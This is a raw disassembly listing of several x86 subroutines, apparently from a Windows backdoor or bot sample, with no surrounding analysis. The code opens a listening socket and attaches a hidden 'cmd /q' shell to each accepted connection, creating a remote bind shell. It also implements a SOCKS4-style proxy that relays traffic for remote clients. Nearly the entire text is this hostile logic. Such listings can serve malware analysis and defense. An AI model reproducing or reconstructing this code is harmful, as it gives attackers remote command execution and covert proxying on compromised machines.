lea eax, [ebp+var_20]
push eax
push ebx
call dword_4CBA00 ; bind
test eax, eax
jnz loc_411657
push 7FFFFFFFh
push ebx
call dword_4CB9FC ; listen
test eax, eax
jnz loc_411657
push offset unk_435474
mov [ebp+var_10], 0Ch
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call sub_415D38
pop ecx
mov [ebp+arg_0], edi
loc_41156F: ; CODE XREF: sub_41144E+15A�j
; sub_41144E+1E4�j
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_34]
push eax
push ebx
call dword_4CBA68 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_41165A
push [ebp+arg_0]
lea eax, [ebp+arg_0]
push eax
push 8
push 0FFFFh
push edi
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jz short loc_41156F
movzx eax, [ebp+var_32]
push [ebp+var_4C]
mov [ebp+var_38], esi
push eax
push [ebp+var_30]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_414]
push offset unk_435430
push eax
call sub_41C266
lea eax, [ebp+var_414]
push eax
call sub_415D38
push edi
lea eax, [ebp+var_414]
push 9
push eax
call sub_40B3BA
mov [ebp+var_48], eax
imul eax, 234h
mov ecx, [ebp+var_4C]
add esp, 24h
mov dword_43E914[eax], ecx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_4111C0
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_48]
imul ecx, 234h
cmp eax, esi
mov dword_43E924[ecx], eax
jz short loc_411642
loc_41162F: ; CODE XREF: sub_41144E+1F2�j
cmp [ebp+var_38], esi
jnz loc_41156F
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_41162F
; ---------------------------------------------------------------------------
loc_411642: ; CODE XREF: sub_41144E+1DF�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_4353F4
call sub_415DAC
pop ecx
pop ecx
jmp short loc_41165A
; ---------------------------------------------------------------------------
loc_411657: ; CODE XREF: sub_41144E+C8�j
; sub_41144E+EC�j ...
mov edi, [ebp+arg_0]
loc_41165A: ; CODE XREF: sub_41144E+13C�j
; sub_41144E+207�j
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_414]
push offset unk_4353BC
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_3C], esi
jnz short loc_41169A
push esi
lea eax, [ebp+var_414]
push [ebp+var_40]
push eax
lea eax, [ebp+var_210]
push eax
push [ebp+var_214]
call sub_409869
add esp, 14h
loc_41169A: ; CODE XREF: sub_41144E+22A�j
lea eax, [ebp+var_414]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push ebx
call dword_4CBA6C ; closesocket
call dword_4CB92C ; WSACleanup
push [ebp+var_4C]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop ebx
loc_4116CC: ; DATA XREF: sub_41144E+5A�o
xor eax, eax
cmp [esp+5E0h+var_5DC], eax
setz al
retn
sub_41144E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4116D6 proc near ; CODE XREF: sub_4111C0+1AF�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_411827
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, dword_43E91C[edi]
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
mov edi, ds:dword_427084
pop ecx
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_4119F9
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_411741
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_435554
call sub_415DAC
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
jmp short loc_41177B
; ---------------------------------------------------------------------------
loc_411741: ; CODE XREF: sub_4116D6+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_411AAB
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_411782
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_435554
call sub_415DAC
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_4270B4 ; TerminateThread
loc_41177B: ; CODE XREF: sub_4116D6+69�j
xor eax, eax
jmp loc_411822
; ---------------------------------------------------------------------------
loc_411782: ; CODE XREF: sub_4116D6+82�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push ebx
push eax
push 3
call ds:dword_427130 ; WaitForMultipleObjects
sub eax, ebx
jz short loc_4117DC
dec eax
jz short loc_4117D6
dec eax
jz short loc_4117C2
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_435520
call sub_415DAC
pop ecx
pop ecx
jmp short loc_4117F1
; ---------------------------------------------------------------------------
loc_4117C2: ; CODE XREF: sub_4116D6+D5�j
mov edi, ds:dword_4270B4
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_4117F1
; ---------------------------------------------------------------------------
loc_4117D6: ; CODE XREF: sub_4116D6+D2�j
push ebx
push dword ptr [esi+10h]
jmp short loc_4117E0
; ---------------------------------------------------------------------------
loc_4117DC: ; CODE XREF: sub_4116D6+CF�j
push ebx
push dword ptr [esi+14h]
loc_4117E0: ; CODE XREF: sub_4116D6+104�j
call ds:dword_4270B4 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_4270FC ; TerminateProcess
loc_4117F1: ; CODE XREF: sub_4116D6+EA�j
; sub_4116D6+FE�j
push dword ptr [esi+10h]
mov edi, ds:dword_427070
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_4CBA6C ; closesocket
push esi
call sub_41BA91
pop ecx
push 1
pop eax
loc_411822: ; CODE XREF: sub_4116D6+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_4116D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411827 proc near ; CODE XREF: sub_4116D6+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_41BEB5
mov esi, eax
pop ecx
cmp esi, edi
jz loc_411911
mov ebx, ds:dword_427108
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx ; CreatePipe
mov edi, ds:dword_427070
test eax, eax
jnz short loc_41188A
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_435604
jmp short loc_4118AA
; ---------------------------------------------------------------------------
loc_41188A: ; CODE XREF: sub_411827+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx ; CreatePipe
test eax, eax
jnz short loc_4118B2
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_4355C4
loc_4118AA: ; CODE XREF: sub_411827+61�j
call sub_415DAC
pop ecx
jmp short loc_4118E0
; ---------------------------------------------------------------------------
loc_4118B2: ; CODE XREF: sub_411827+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_411920
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_411915
push offset unk_43559C
call sub_415D38
loc_4118E0: ; CODE XREF: sub_411827+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_4118EC
push [ebp+var_4]
call edi ; CloseHandle
loc_4118EC: ; CODE XREF: sub_411827+BE�j
cmp [ebp+var_8], 0
jz short loc_4118F7
push [ebp+var_8]
call edi ; CloseHandle
loc_4118F7: ; CODE XREF: sub_411827+C9�j
mov eax, [esi]
test eax, eax
jz short loc_411900
push eax
call edi ; CloseHandle
loc_411900: ; CODE XREF: sub_411827+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_41190A
push eax
call edi ; CloseHandle
loc_41190A: ; CODE XREF: sub_411827+DE�j
push esi
call sub_41BA91
pop ecx
loc_411911: ; CODE XREF: sub_411827+1D�j
xor eax, eax
jmp short loc_41191B
; ---------------------------------------------------------------------------
loc_411915: ; CODE XREF: sub_411827+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_41191B: ; CODE XREF: sub_411827+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_411827 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411920 proc near ; CODE XREF: sub_411827+94�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_58]
push esi
push eax
mov [ebp+var_4], esi
call sub_41BF70
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_41BF70
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+var_58], edi
mov edi, ds:dword_427104
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_427100 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_427074 ; CreateProcessA
test eax, eax
jz short loc_4119DC
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_43E918[eax], ecx
call ds:dword_427070 ; CloseHandle
jmp short loc_4119F2
; ---------------------------------------------------------------------------
loc_4119DC: ; CODE XREF: sub_411920+9A�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_435644
call sub_415DAC
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_4119F2: ; CODE XREF: sub_411920+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_411920 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4119F9 proc near ; DATA XREF: sub_4116D6+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
mov ebx, ds:dword_4270EC
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
loc_411A22: ; CODE XREF: sub_4119F9+8F�j
call ebx ; ReadFile
test eax, eax
jz short loc_411A8A
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_411A5D
loc_411A33: ; CODE XREF: sub_4119F9+62�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_411A4D
cmp dl, 0Dh
jz short loc_411A4D
mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_411A4D: ; CODE XREF: sub_4119F9+44�j
; sub_4119F9+49�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_411A33
loc_411A5D: ; CODE XREF: sub_4119F9+38�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_4CBA24 ; send
test eax, eax
jle short loc_411A8A
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
jmp short loc_411A22
; ---------------------------------------------------------------------------
loc_411A8A: ; CODE XREF: sub_4119F9+2D�j
; sub_4119F9+79�j
mov esi, ds:dword_427094
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_411AA6
call esi ; RtlGetLastWin32Error
push eax
push offset unk_435684
call sub_415DAC
pop ecx
pop ecx
loc_411AA6: ; CODE XREF: sub_4119F9+9C�j
pop edi
pop esi
pop ebx
leave
retn
sub_4119F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411AAB proc near ; DATA XREF: sub_4116D6+71�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
loc_411AC4: ; CODE XREF: sub_411AAB+39�j
; sub_411AAB+D7�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call dword_4CB9EC ; recv
test eax, eax
jle loc_411BC9
cmp [ebp+var_10], ebx
jbe short loc_411AE6
dec [ebp+var_10]
jmp short loc_411AC4
; ---------------------------------------------------------------------------
loc_411AE6: ; CODE XREF: sub_411AAB+34�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_411BA9
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_411B56
cmp al, 7Fh
jz short loc_411B56
cmp al, 3
jnz short loc_411B11
push ebx
push ebx
call ds:dword_427134 ; GenerateConsoleCtrlEvent
jmp short loc_411B7D
; ---------------------------------------------------------------------------
loc_411B11: ; CODE XREF: sub_411AAB+5A�j
cmp al, 15h
jnz short loc_411B33
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_411B69
; ---------------------------------------------------------------------------
loc_411B33: ; CODE XREF: sub_411AAB+68�j
mov [ebp+esi+var_DC], al
inc esi
push 1
cmp al, 0Dh
mov [ebp+var_8], al
pop ecx
jnz short loc_411B6A
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_411B69
; ---------------------------------------------------------------------------
loc_411B56: ; CODE XREF: sub_411AAB+52�j
; sub_411AAB+56�j
cmp esi, ebx
jbe short loc_411B80
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_411B69: ; CODE XREF: sub_411AAB+86�j
; sub_411AAB+A9�j
pop ecx
loc_411B6A: ; CODE XREF: sub_411AAB+98�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call dword_4CBA24 ; send
test eax, eax
jle short loc_411BC9
loc_411B7D: ; CODE XREF: sub_411AAB+64�j
mov al, byte ptr [ebp+arg_0+3]
loc_411B80: ; CODE XREF: sub_411AAB+AD�j
cmp al, 0Dh
jnz loc_411AC4
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call ds:dword_4270F0 ; WriteFile
test eax, eax
jz short loc_411BC9
xor esi, esi
jmp loc_411AC4
; ---------------------------------------------------------------------------
loc_411BA9: ; CODE XREF: sub_411AAB+47�j
cmp [ebp+var_C], ebx
jnz short loc_411BBA
mov [ebp+var_C], 1
jmp loc_411AC4
; ---------------------------------------------------------------------------
loc_411BBA: ; CODE XREF: sub_411AAB+101�j
mov [ebp+var_10], 0Ah
mov [ebp+var_C], ebx
jmp loc_411AC4
; ---------------------------------------------------------------------------
loc_411BC9: ; CODE XREF: sub_411AAB+2B�j
; sub_411AAB+D0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_411AAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411BCE proc near ; DATA XREF: sub_401ACD+2BC4�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
push 1
xor esi, esi
pop edi
mov [eax+0A8h], edi
push ebx
lea eax, [ebp+var_14]
push esi
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_40]
call dword_4CB9D4 ; htons
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call dword_4CBA54 ; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov dword_43E91C[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call dword_4CBA00 ; bind
test eax, eax
jnz loc_411D70
push 0Ah
push edi
call dword_4CB9FC ; listen
test eax, eax
jnz loc_411D70
push [ebp+var_40]
push [ebp+var_D4]
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+var_2D4]
push offset dword_42BC94
push eax
call sub_41C266
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_411CA9
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_409869
add esp, 14h
loc_411CA9: ; CODE XREF: sub_411BCE+B9�j
; sub_411BCE+172�j ...
lea eax, [ebp+var_2D4]
push eax
call sub_415D38
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_4CBA68 ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_2D4]
push offset dword_435730
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2D4]
push 19h
push eax
call sub_40B3BA
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_43E914[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_411DD3
push esi
push esi
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_43E924[ecx], eax
jz short loc_411D50
loc_411D3D: ; CODE XREF: sub_411BCE+180�j
cmp [ebp+var_28], esi
jnz loc_411CA9
push 5
call ds:dword_427080 ; Sleep
jmp short loc_411D3D
; ---------------------------------------------------------------------------
loc_411D50: ; CODE XREF: sub_411BCE+16D�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2D4]
push offset dword_4356F4
push eax
call sub_41C266
add esp, 0Ch
jmp loc_411CA9
; ---------------------------------------------------------------------------
loc_411D70: ; CODE XREF: sub_411BCE+7B�j
; sub_411BCE+8C�j
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_40]
lea eax, [ebp+var_2D4]
push offset dword_4356C0
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_411DB3
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_409869
add esp, 14h
loc_411DB3: ; CODE XREF: sub_411BCE+1C3�j
lea eax, [ebp+var_2D4]
push eax
call sub_415D38
push [ebp+var_3C]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_411BCE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411DD3 proc near ; DATA XREF: sub_411BCE+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
var_4C8 = byte ptr -4C8h
var_C8 = byte ptr -0C8h
var_44 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
push 1
mov [ebp+arg_0], esi
imul esi, 234h
pop edi
lea esi, dword_43E91C[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call dword_4CB9BC ; select
test eax, eax
jnz short loc_411E54
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_411E54: ; CODE XREF: sub_411DD3+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call dword_4CB9EC ; recv
test eax, eax
jg short loc_411E85
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_411E85: ; CODE XREF: sub_411DD3+98�j
cmp [ebp+var_4D0], 4
jnz loc_41207F
cmp [ebp+var_4CF], 1
jnz loc_41207F
cmp [ebp+var_44], bl
jz short loc_411F1B
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_411F1B
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
push offset dword_4357F8
call sub_415DAC
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call sub_41BF70
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4CBA24 ; send
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_411F1B: ; CODE XREF: sub_411DD3+CF�j
; sub_411DD3+E5�j
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_41BF70
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call dword_4CBA54 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_411FB3
call dword_4CB968 ; WSAGetLastError
push eax
push offset dword_4357B8
call sub_415DAC
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_41BF70
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4CBA24 ; send
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_411FB3: ; CODE XREF: sub_411DD3+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_412022
call dword_4CB968 ; WSAGetLastError
push eax
push offset dword_435774
call sub_415DAC
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_41BF70
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4CBA24 ; send
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_412022: ; CODE XREF: sub_411DD3+1F0�j
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4CBA24 ; send
push dword ptr [esi]
push edi
call sub_412097
pop ecx
pop ecx
push edi
call dword_4CBA6C ; closesocket
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_41207F: ; CODE XREF: sub_411DD3+B9�j
; sub_411DD3+C6�j
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
sub_411DD3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412097 proc near ; CODE XREF: sub_411DD3+286�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_4120AD: ; CODE XREF: sub_412097+C5�j
; sub_412097+F5�j
mov [ebp+var_100], ebx
mov [ebp+var_104], 1
xor ecx, ecx
lea eax, [ebp+var_100]
loc_4120C5: ; CODE XREF: sub_412097+3C�j
mov edx, [ebp+arg_0]
cmp [eax], edx
jz short loc_4120D5
inc ecx
add eax, 4
cmp ecx, 1
jb short loc_4120C5
loc_4120D5: ; CODE XREF: sub_412097+33�j
cmp ecx, 1
jnz short loc_4120EA
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_4120EA: ; CODE XREF: sub_412097+41�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call dword_4CB9BC ; select
lea eax, [ebp+var_104]
push eax
push ebx
call dword_4CB8C0 ; __WSAFDIsSet
test eax, eax
jz short loc_41214A
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call dword_4CB9EC ; recv
cmp eax, 0FFFFFFFFh
jz short loc_412192
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_412192
loc_41214A: ; CODE XREF: sub_412097+85�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_4CB8C0 ; __WSAFDIsSet
test eax, eax
jz loc_4120AD
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
cmp eax, 0FFFFFFFFh
jz short loc_412192
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz loc_4120AD
loc_412192: ; CODE XREF: sub_412097+9A�j
; sub_412097+B1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_412097 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
